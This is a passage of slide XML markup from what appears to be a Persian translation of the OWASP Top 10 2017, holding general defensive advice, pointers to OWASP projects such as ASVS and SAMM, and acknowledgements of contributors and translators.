                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> تدارک دیده شده است.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تغییر همیشگی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="fa-IR" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> همیشه به دنبال تغییر خواهد بود.حتی بدون تغییر یک خط از کد برنامه‌تان، شما ممکن است که با کشف آسیب های جدید و روش های حمله ، آسیب پذیر شوید. لطفا جهت کسل اطلاعات بیشتر ، توصیه هایی که در انتهای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>در </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>توسعه دهندگان</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>ارزیاب های امنیت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>سازمان ها</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>مدیران برنامه</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> آمده است را برای اطلاعات بیشتر مطالعه کنید.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fa-IR" sz="950" b="1" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مثبت فکر کنید.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>زمانی که آماده شدید تا بدنبال آسیب پذیری گشتن را متوقف کنید و روی اعمال کنترل های امنیتی قدرتمند در برنامه متمرکز شوید، پروژه ی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>کنترل پویشگرایانه ی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> نقطه شروعی برای کمک به توسعه دهندگان برای اعمال امنیت در برنامه هایشان مهیا می کند. و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>استاندارد تایید امنیتی برنامه کاربردی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>OWASP (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> یک راهنما برای سازمان ها و بررسی کنندگان برنامه هاست برای اینکه بدانند چه چیزی را تایید کنند.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fa-IR" sz="950" b="1" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>از ابزارها با هوشمندی استفاده کنید</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="fa-IR" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>آسیب پذیری های امنیتی میتوانند کاملا پیچیده باشند و عمیقا در کدها مدفون شده باشند.در موارد بسیار، مقرون به صرفه ترین رویکرد برای کشف و از بین بردن این ضعف ها ، متخصص های انسانی هستند که با ابزارهای پیشرفته تجهیز شده اند. تکیه صرف روی ابزارها یک حس اشتباه امنیتی ایجاد میکند و توصیه نمیشود.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1"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Push left, right, and everywhere</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fa-IR" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>بر روی امنیت به عنوان بخشی لاینفک از فرهنگتان در سازمان توسعه دهندگی خود تمرکز کنید. در این لینک میتوانید اطلاعات بیشتری کسب کنید:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="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3543461590"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="4097906"/>
          <a:ext cx="3429000" cy="5805951"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="324000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ارجاع</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5468511">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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مایلیم از سازمانی هایی که دیتای خود را برای حمایت از بروزرسانی ۲۰۱۷ به اشتراک گذاشتند تشکر کنیم. ما بیش از ۴۰ پاسخ برای تقاضای دیتا دریافت کردیم. برای اولین بار ، تمامی دیتایی که برای نسخه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 10</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به اشتراک گذاشته شده اند و تمامی مشارک کنندگان به صورت عمومی قابل دسترس است.ما معتقدیم که این یکی از بزرگترین مجموعه دیتاهای مربوط به آسیب پذیری است که تا کنون به صورت عمومی جمع آوری شده است.</a:t>
                      </a:r>
                      <a:endPar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gn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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به این دلیل که اینجا تعداد مشارکت کنندگان از فضایی که در اختیار داریم بیشتر است ،‌یک صفحه ی مجزا در پایان این سند برای شناسایی مشارکت کنندگان ایجاد کرده ایم. از صمیم قلب از این سازمان ها که با تمایل خودشان در خط مقدم حضور داشتند و دیتای مربوط به آسیب پذیری ها که نتیجه ی تلاش هایشان بود را به صورت عمومی به اشتراک گذاشتند تشکر میکنیم.امیدواریم که این اقدام در جهت رشد و تشویق دیگر سازمان ها جهت انجام اقدامات مشابه و نقطه عطفی در راستای امنیت مستند ، ادامه داشته باشد.</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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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یک تشکر ویژه به بیش از ۵۰۰ نفر که در مسیر رنکینگ صنعتی وقت گذاشتند. صدای شما کمک کرد که دو مورد جدید به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 10</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اضافه شود.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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مایلیم که از افرادی که نظرات سازنده‌ی خود و همینطور زمانی را برای بررسی این بروزرسانی به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 10 </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با ما به اشتراک گذاشتند تشکر کنیم.تا جایی که ممکن است ما لیستی از این افراد را در قسمت قدردانی قرار داده ایم.</a:t>
                      </a:r>
                      <a:endPar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gn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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و در نهایت مایلیم که پیشاپیش از تمام مترجم هایی که این نسخه از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 10 </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را به زبان های مختلف ترجمه میکنند و کمک میکنند که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TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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در کل سیاره بیشتر قابل دسترس باشد تشکر کنیم.</a:t>
                      </a:r>
                      <a:endPar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fa-IR" dirty="0"/>
              <a:t>م</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>معرفی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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290527516"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6849380" cy="8966400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6849380">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="343625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>از 2013 تا 2017 چه چیزهایی تغییر کرده اند؟</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0"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622775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
